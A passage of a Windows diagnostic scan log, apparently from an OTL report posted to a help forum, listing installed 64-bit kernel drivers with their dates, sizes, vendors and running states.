DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,412,056 | ---- | M] (Intel Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\iaStorV.sys -- (iaStorV)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,118,168 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\scmbus.sys -- (scmbus)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,100,352 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\pmem.sys -- (pmem)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,098,816 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\parport.sys -- (Parport)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,092,056 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\IPMIDrv.sys -- (IPMIDRV)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,088,576 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\nvdimmn.sys -- (nvdimmn)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,084,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\serial.sys -- (Serial)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,079,256 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uaspstor.sys -- (UASPStor)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,058,880 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicDisplay.sys -- (BasicDisplay)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,055,840 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mausbip.sys -- (mausbip)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,043,008 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vnvdimm.sys -- (vnvdimm)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,040,856 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\mssmbios.sys -- (mssmbios)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,038,912 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\invdimm.sys -- (invdimm)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,037,784 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\bttflt.sys -- (bttflt)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\CmBatt.sys -- (CmBatt)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,028,568 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uefi.sys -- (UEFI)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,028,568 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\atapi.sys -- (atapi)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,025,088 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\serenum.sys -- (Serenum)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,019,352 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\intelide.sys -- (intelide)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,018,840 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\msisadrv.sys -- (msisadrv)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,018,432 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\wmiacpi.sys -- (WmiAcpi)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,016,280 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\pciide.sys -- (pciide)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,015,392 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\volume.sys -- (volume)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,013,312 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpitime.sys -- (acpitime)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:03 | 000,012,800 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpipagr.sys -- (acpipagr)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 001,723,288 | ---- | M] (Chelsio Communications) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\cht4vx64.sys -- (cht4vbd)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 001,135,512 | ---- | M] (PMC-Sierra) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\adp80xx.sys -- (ADP80XX)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,842,648 | ---- | M] (Mellanox) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mlx4_bus.sys -- (mlx4_bus)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,575,896 | ---- | M] (LSI Corporation, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\megasr.sys -- (megasr)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,526,232 | ---- | M] (Mellanox) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ibbus.sys -- (ibbus)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,357,272 | ---- | M] (Chelsio Communications) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\cht4sx64.sys -- (cht4iscsi)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,305,560 | ---- | M] (VIA Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\VSTXRAID.SYS -- (VSTXRAID)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,258,592 | ---- | M] (AMD Technologies Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,237,056 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\1394ohci.sys -- (1394ohci)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,166,808 | ---- | M] (VIA Technologies Inc.,Ltd) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\vsmraid.sys -- (vsmraid)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,166,296 | ---- | M] (NVIDIA Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\nvstor.sys -- (nvstor)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,159,744 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\cdrom.sys -- (cdrom)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,150,424 | ---- | M] (NVIDIA Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\nvraid.sys -- (nvraid)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,131,992 | ---- | M] (PMC-Sierra, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\arcsas.sys -- (arcsas)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,123,800 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2i.sys -- (LSI_SAS2i)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,122,368 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\capimg.sys -- (CapImg)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,109,976 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\sbp2port.sys -- (sbp2port)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,108,952 | ---- | M] (Mellanox) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ndfltr.sys -- (ndfltr)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,108,064 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas.sys -- (LSI_SAS)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,107,416 | ---- | M] (LSI) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\3ware.sys -- (3ware)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,103,320 | ---- | M] (Avago Technologies) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas3i.sys -- (LSI_SAS3i)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,083,352 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,082,840 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sss.sys -- (LSI_SSS)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,081,816 | ---- | M] (Silicon Integrated Systems) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\sisraid4.sys -- (SiSRaid4)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,064,920 | ---- | M] (Mellanox) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\winverbs.sys -- (WinVerbs)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,063,896 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\mvumis.sys -- (mvumis)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,063,520 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,063,520 | ---- | M] (Avago Technologies) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\MegaSas2i.sys -- (megasas2i)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,061,848 | ---- | M] (Avago Technologies) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\percsas3i.sys -- (percsas3i)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,059,800 | ---- | M] (Avago Technologies) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\megasas.sys -- (megasas)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,058,776 | ---- | M] (Avago Technologies) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\percsas2i.sys -- (percsas2i)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,056,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\umbus.sys -- (umbus)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,044,952 | ---- | M] (Silicon Integrated Systems Corp.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\sisraid2.sys -- (SiSRaid2)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,038,296 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidbatt.sys -- (HidBatt)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,032,768 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fdc.sys -- (fdc)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,032,152 | ---- | M] (Mellanox) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\winmad.sys -- (WinMad)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,031,128 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wacompen.sys -- (WacomPen)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,027,032 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,026,624 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\flpydisk.sys -- (flpydisk)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,020,480 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\AcpiDev.sys -- (AcpiDev)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,017,920 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sfloppy.sys -- (sfloppy)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,016,896 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\MTConfig.sys -- (MTConfig)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,013,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\errdev.sys -- (ErrDev)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:02 | 000,009,728 | ---- | M] (Windows (R) Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bcmfn2.sys -- (bcmfn2)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:01 | 003,419,032 | ---- | M] (QLogic Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:01 | 000,721,920 | ---- | M] (Ralink Technology, Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netr7364.sys -- (netr7364)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:01 | 000,533,912 | ---- | M] (QLogic Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:01 | 000,280,576 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\usbvideo.sys -- (usbvideo)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:01 | 000,130,640 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\intelpep.sys -- (intelpep)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:01 | 000,103,936 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rhproxy.sys -- (rhproxy)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:01 | 000,046,080 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbscan.sys -- (usbscan)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:01 | 000,038,912 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\monitor.sys -- (monitor)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:01 | 000,038,128 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_GPIO.sys -- (iaLPSSi_GPIO)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:01 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbprint.sys -- (usbprint)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:01 | 000,016,896 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\pnpmem.sys -- (PNPMEM)
DRV:[b]64bit:[/b] - [2017/09/29 14:41:01 | 000,014,336 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpipmi.sys -- (AcpiPmi)
DRV:[b]64bit:[/b] - [2017/09/29 14:40:59 | 000,174,592 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSS2i_I2C_BXT_P.sys -- (iaLPSS2i_I2C_BXT_P)
DRV:[b]64bit:[/b] - [2017/09/29 14:40:59 | 000,171,520 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSS2i_I2C.sys -- (iaLPSS2i_I2C)
DRV:[b]64bit:[/b] - [2017/09/29 14:40:59 | 000,135,168 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBAUDIO.sys -- (usbaudio)
DRV:[b]64bit:[/b] - [2017/09/29 14:40:59 | 000,119,704 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\pcmcia.sys -- (pcmcia)
DRV:[b]64bit:[/b] - [2017/09/29 14:40:59 | 000,118,680 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\EhStorTcgDrv.sys -- (EhStorTcgDrv)
DRV:[b]64bit:[/b] - [2017/09/29 14:40:59 | 000,113,152 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_I2C.sys -- (iaLPSSi_I2C)
DRV:[b]64bit:[/b] - [2017/09/29 14:40:59 | 000,102,912 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbcir.sys -- (usbcir)
DRV:[b]64bit:[/b] - [2017/09/29 14:40:59 | 000,091,648 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iai2c.sys -- (iai2c)
DRV:[b]64bit:[/b] - [2017/09/29 14:40:59 | 000,088,576 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSS2i_GPIO2_BXT_P.sys -- (iaLPSS2i_GPIO2_BXT_P)
DRV:[b]64bit:[/b] - [2017/09/29 14:40:59 | 000,086,016 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\hdaudbus.sys -- (HDAudBus)
DRV:[b]64bit:[/b] - [2017/09/29 14:40:59 | 000,079,360 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSS2i_GPIO2.sys -- (iaLPSS2i_GPIO2)
DRV:[b]64bit:[/b] - [2017/09/29 14:40:59 | 000,067,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bthmodem.sys -- (BTHMODEM)
DRV:[b]64bit:[/b] - [2017/09/29 14:40:59 | 000,060,312 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\CAD.sys -- (CAD)
DRV:[b]64bit:[/b] - [2017/09/29 14:40:59 | 000,049,152 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\circlass.sys -- (circlass)
DRV:[b]64bit:[/b] - [2017/09/29 14:40:59 | 000,046,592 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidir.sys -- (HidIr)
DRV:[b]64bit:[/b] - [2017/09/29 14:40:59 | 000,040,448 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\DriverStore\FileRepository\compositebus.inf_amd64_9c1fb8f4db31c348\CompositeBus.sys -- (CompositeBus)
DRV:[b]64bit:[/b] - [2017/09/29 14:40:59 | 000,036,864 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iagpio.sys -- (iagpio)
DRV:[b]64bit:[/b] - [2017/09/29 14:40:59 | 000,016,224 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\drmkaud.sys -- (drmkaud)
DRV:[b]64bit:[/b] - [2017/09/28 20:36:10 | 000,140,208 | ---- | M] (Razer, Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\rzpnk.sys -- (rzpnk)
DRV:[b]64bit:[/b] - [2017/07/11 19:26:14 | 000,167,592 | ---- | M] (AVAST Software) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\aswstm.sys -- (aswStm)
DRV:[b]64bit:[/b] - [2017/05/18 07:25:41 | 000,507,928 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\aswNetSec.sys -- (aswNetSec)
DRV:[b]64bit:[/b] - [2017/05/18 07:24:34 | 000,032,600 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\aswKbd.sys -- (aswKbd)
DRV:[b]64bit:[/b] - [2017/05/18 07:21:54 | 000,569,192 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\SysNative\drivers\aswSP.sys -- (aswSP)
DRV:[b]64bit:[/b] - [2017/05/18 07:21:54 | 000,339,696 | ---- | M] (AVAST Software) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\aswVmm.sys -- (aswVmm)
DRV:[b]64bit:[/b] - [2017/05/18 07:21:54 | 000,128,648 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\SysNative\drivers\aswMonFlt.sys -- (aswMonFlt)
DRV:[b]64bit:[/b] - [2017/05/18 07:21:54 | 000,075,704 | ---- | M] (AVAST Software) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\aswRvrt.sys -- (aswRvrt)
DRV:[b]64bit:[/b] - [2017/05/18 07:21:54 | 000,038,296 | ---- | M] (AVAST Software) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\aswHwid.sys -- (aswHwid)
DRV:[b]64bit:[/b] - [2017/05/18 07:21:53 | 000,101,152 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\aswRdr2.sys -- (aswRdr)
DRV:[b]64bit:[/b] - [2017/05/18 07:21:34 | 001,007,160 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\SysNative\drivers\aswSnx.sys -- (aswSnx)
DRV:[b]64bit:[/b] - [2017/05/18 07:21:29 | 000,334,576 | ---- | M] (AVAST Software s.r.o.) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\aswbloga.sys -- (aswblog)
DRV:[b]64bit:[/b] - [2017/05/18 07:21:29 | 000,311,808 | ---- | M] (AVAST Software s.r.o.) [File_System | System | Running] -- C:\Windows\SysNative\drivers\aswbidsdrivera.sys -- (aswbidsdriver)
DRV:[b]64bit:[/b] - [2017/05/18 07:21:29 | 000,190,256 | ---- | M] (AVAST Software s.r.o.) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\aswbidsha.sys -- (aswbidsh)
DRV:[b]64bit:[/b] - [2017/05/18 07:21:29 | 000,049,016 | ---- | M] (AVAST Software s.r.o.) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\aswbuniva.sys -- (aswbuniv)
DRV:[b]64bit:[/b] - [2017/04/14 18:29:31 | 000,129,152 | ---- | M] (Samsung Electronics Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ssudbus.sys -- (dg_ssudbus)
DRV:[b]64bit:[/b] - [2017/04/14 18:27:37 | 000,095,024 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dc3d.sys -- (dc3d)
DRV:[b]64bit:[/b] - [2017/03/29 17:05:42 | 000,044,096 | ---- | M] (IObit.com) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\IMFCameraProtect.sys -- (IMFCameraProtect)
DRV:[b]64bit:[/b] - [2016/12/05 14:32:38 | 000,520,032 | ---- | M] (BitDefender S.R.L.) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\trufos.sys -- (Trufos)
DRV:[b]64bit:[/b] - [2016/11/25 17:53:57 | 000,044,640 | ---- | M] (The OpenVPN Project) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\aswTap.sys -- (aswTap)
DRV:[b]64bit:[/b] - [2016/07/30 07:08:27 | 000,020,160 | ---- | M] (Glarysoft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\GUSBootStartup.sys -- (GUSBootStartup)
DRV:[b]64bit:[/b] - [2016/07/22 12:51:46 | 000,049,896 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WirelessKeyboardFilter.sys -- (WirelessKeyboardFilter)
DRV:[b]64bit:[/b] - [2016/07/17 10:02:26 | 000,047,672 | ---- | M] (Disc Soft Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dtliteusbbus.sys -- (dtliteusbbus)
DRV:[b]64bit:[/b] - [2016/07/17 10:02:01 | 000,030,264 | ---- | M] (Disc Soft Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dtlitescsibus.sys -- (dtlitescsibus)
DRV:[b]64bit:[/b] - [2016/07/15 19:10:44 | 000,151,184 | ---- | M] (MBB) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usb2ser.sys -- (wdm_usb)
DRV:[b]64bit:[/b] - [2016/04/12 08:35:37 | 000,020,160 | ---- | M] (Glarysoft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\GUBootStartup.sys -- (GUBootStartup)
DRV:[b]64bit:[/b] - [2016/03/22 10:02:16 | 000,021,360 | ---- | M] (IObit) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\SmartDefragDriver.sys -- (SmartDefragDriver)
DRV:[b]64bit:[/b] - [2016/02/18 08:37:26 | 000,020,096 | ---- | M] (GlarySoft Ltd) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\GUMHFilter.sys -- (GUMHFilter)
DRV:[b]64bit:[/b] - [2016/02/09 10:16:26 | 000,033,552 | ---- | M] (Windows (R) Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tsvadpcm.sys -- (TSVAD_PCM)
DRV:[b]64bit:[/b] - [2015/12/18 17:08:18 | 000,117,768 | ---- | M] (Oracle Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\VBoxNetAdp6.sys -- (VBoxNetAdp)
DRV:[b]64bit:[/b] - [2015/12/08 03:00:58 | 000,214,832 | ---- | M] (DEVGURU Co., LTD.(www.devguru.co.kr)) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ssudmdm.sys -- (ssudmdm)
DRV:[b]64bit:[/b] - [2015/08/31 22:50:26 | 000,185,088 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\TeeDriverW8x64.sys -- (MEIx64)
DRV:[b]64bit:[/b] - [2015/05/25 23:29:04 | 000,026,200 | ---- | M] (SplitmediaLabs Limited) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\xspltspk.sys -- (XSplit_Dummy)
DRV:[b]64bit:[/b] - [2015/01/13 17:41:40 | 011,922,944 | ---- | M] (Advanced Micro Devices, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\atikmdag.sys -- (amdkmdag)
DRV:[b]64bit:[/b] - [2015/01/13 16:20:44 | 000,359,936 | ---- | M] (Advanced Micro Devices, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\atikmpag.sys -- (amdkmdap)
DRV:[b]64bit:[/b] - [2014/08/12 15:27:38 | 000,022,568 | ---- | M] (IVT Corporation.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BtHidBus.sys -- (BtHidBus)
DRV:[b]64bit:[/b] - [2014/02/07 12:17:24 | 000,038,992 | ---- | M] (Screaming Bee LLC) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ScreamingBAudio64.sys -- (ScreamBAudioSvc)
